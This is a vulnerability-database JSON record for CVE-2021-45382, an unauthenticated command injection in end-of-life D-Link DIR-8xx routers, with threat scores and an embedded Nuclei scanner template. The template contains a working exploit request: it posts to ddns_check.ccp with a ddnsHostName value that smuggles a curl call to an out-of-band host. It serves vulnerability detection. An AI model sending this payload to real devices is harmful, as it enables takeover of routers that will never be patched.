{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-45382/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-45382/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-45382/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-45382/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-45382/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-45382"},"sightings":{"href":"/api/v1/sightings/cve-2021-45382"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.97836,"kev":true,"percentile":0.99905},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-45382.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2021-45382\n\ninfo:\n  name: D-Link - Remote Command Execution\n  author: king-alexander\n  severity: critical\n  description: |\n    A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file\n  impact: |\n    Unauthenticated attackers can execute arbitrary system commands via command injection in the DDNS function, leading to complete router compromise and control over network traffic.\n  remediation: |\n    DIR-810L, DIR-820L, DIR-830L, DIR-826L, DIR-836L, all hardware revisions, have reached their End of Life (\"EOL\") /End of Service Life (\"EOS\") Life-Cycle and as such this issue will not be patched.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-45382\n    - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10264\n    - https://github.com/doudoudedi/D-LINK_Command_Injection1/blob/main/D-LINK_Command_injection.md#poc\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/Ostorlab/KEV\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-45382\n    cwe-id: CWE-78\n    epss-score: 0.97836\n    epss-percentile: 0.99904\n    cpe: cpe:2.3:o:dlink:dir-820l_firmware:-:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: dlink\n    product: dir-820l_firmware\n  tags: cve2021,cve,dlink,kev,rce,vkev,vuln\nvariables:\n  string1: \"{{to_lower(rand_base(5))}}\"\n  string2: \"{{to_lower(rand_base(6))}}\"\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/ddns_check.ccp\"\n\n    body: \"ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername={{string1}}&ddnsPassword={{string2}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - http\n\n      - type: word\n        part: interactsh_request\n        words:\n          - \"User-Agent: curl\"\n# digest: 4a0a00473045022100efcc7c88e8b7b5d18f2a906c0cd48a72c19548873becc44ef38477111d07747e0220056803e733a0cbcb82652ff95478c432a55fbdfa88c810bcaece3a45e30f32d5:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2021-45382"}